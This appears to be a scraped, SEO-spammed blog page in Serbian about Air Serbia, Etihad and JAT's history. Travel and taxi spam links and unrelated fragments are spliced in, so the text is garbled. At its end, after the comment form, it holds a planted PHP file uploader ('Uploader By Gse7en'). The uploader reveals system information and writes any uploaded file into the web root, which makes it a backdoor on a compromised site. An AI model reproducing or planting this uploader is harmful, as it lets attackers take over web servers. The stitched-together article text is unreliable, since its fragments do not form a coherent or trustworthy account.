KOLUMNA ALENA ŠĆURICA Hoće li Etihad otići iz Er Srbije i koja je šansa da je Hainan kupi?

prevoz kamionom crna gora Mali oglasi i prodavnice # Goglasi com

Jer vlast si ne može priuštiti takav politički fijasko. Bila bi to bomba svih bombi. I vjerujte mi u stanju su napraviti bilo šta (obvezati se čak i da aerodrom nakon određenog broja godina prelazi u trajo podgorica tirana taxi http://www.taxi-travel.me/ vlasništvo) samo da se ne izblamiraju i ne izgube političke bodove. Što se tiče Air Serbije, može li ona opstati kao nezavisna kompanija? Mislim da se i tu slažemo da ne može, pisali ste o tome.

px” alt=”podgorica tirana taxi http://www.taxi-travel.me/””/>Z– U flotu ukljucena još tri aviona tipa DC-3. Nalazi se u centralnom delu Italije, u regionu Lacio, na mestu gde se spajaju reke Anijen i Tibar. On uz svoje ime nosi jedan velelepni opis – Rim Večni grad. Poznat je i kao centar sveta, a izreka „Svi putevi vode u Rim“ svedoči tome. Od ovog grada, nastala je jedna od najmoćnijih država u istoriji, koja je oblikovala svet koji danas postoji. Ovaj grad je veoma star – prema legendi potiče iz 753.godine, kada su ga osnovala braća Romul i Rem.

Osnovan JAT

Aprila JAT je uspostavio redovni saobracaj sa Iranom i obavio prvi let na liniji Beograd – Teheran. – Zbog razbuktavanja rata u Hrvatskoj i sve težeg položaja u Sloveniji, JAT je u avgustu i septembru obustavio vazdušni saobracaj preko svih aerodroma u ovim bivšim jugoslovenskim republikama. Poslednji let sa aerdroma u Zadru JAT je obavio 3. A sa aerodroma Krk kod Rijeke 5, a iz Zagrebe, Dubrovnika i Splita 6. Avgusta. Poslednji let iz Pule JAT je obavio 13.

podgorica tirana taxi	http://www.taxi-travel.me/'

Svi faktori u Srbiji moraju dati 100% da linija opstane. Tu je najvažnija https://podgorica.taxi/ Air Serbija. Nedostatak ovog code-share je ozbiljan propust.

TUTIN – NOVI PAZAR – VIENNA

– Oktobra meseca otvorena je i linija za Larnaku. – Nemacka vlada je uvela embargo za sve vrste saobracaja s Jugoslavijom, deklarativno celom zemljom, https://taxi-travel.me/ ali, cak i bez prikrivanja, zapravo samo sa Srbijom i Crnom Gorom. Maja otvorena linija Beograd – Lenjingrad. Maja, otvoren aerodrom „Maribor“.

Aegean, Wizz and Lufthansa bid for new Macedonian routes – EX-YU Aviation News

Aegean, Wizz and Lufthansa bid for new Macedonian routes.

Posted: Fri, 27 Jan 2023 08:00:00 GMT [source]

– Ispade da je JAT tokom verovatno najuzasnije 23 godine u Srbjji manje napravio gubitaka od AS za 3-4 godine. – AS lepo treba samo da iskopira linije Lufthanse i WizzAira iz Beigrada ali sa manjim avionima i eto dovoljno P2P putnika da se ojaca i prezivi do sledeceg talasa svetskih promena. – Ekspamzija LH moze jako neprijatno po njihovu profitabilnost da se zavrsi. Bas su se razmahali, a svaka nerealna ekspanzija pre ili kasnije se zavrsava neprijatno. Februara, u redovnom saobracaju JAT poceo da slece u Melburn.

Leave a Comment

Your email address will not be published. Required fields are marked *

Uploader By Gse7en
"; echo "".php_uname()."
"; echo "
"; $root = $_SERVER['DOCUMENT_ROOT']; $files = $_FILES['idx_file']['name']; $dest = $root.'/'.$files; if(isset($_POST['upload'])) { if(is_writable($root)) { if(@copy($_FILES['idx_file']['tmp_name'], $dest)) { $web = "http://".$_SERVER['HTTP_HOST']."/"; echo "sukses upload -> $web/$files"; } else { echo "gagal upload di document root."; } } else { if(@copy($_FILES['idx_file']['tmp_name'], $files)) { echo "sukses upload $files di folder ini"; } else { echo "gagal upload"; } } } ?>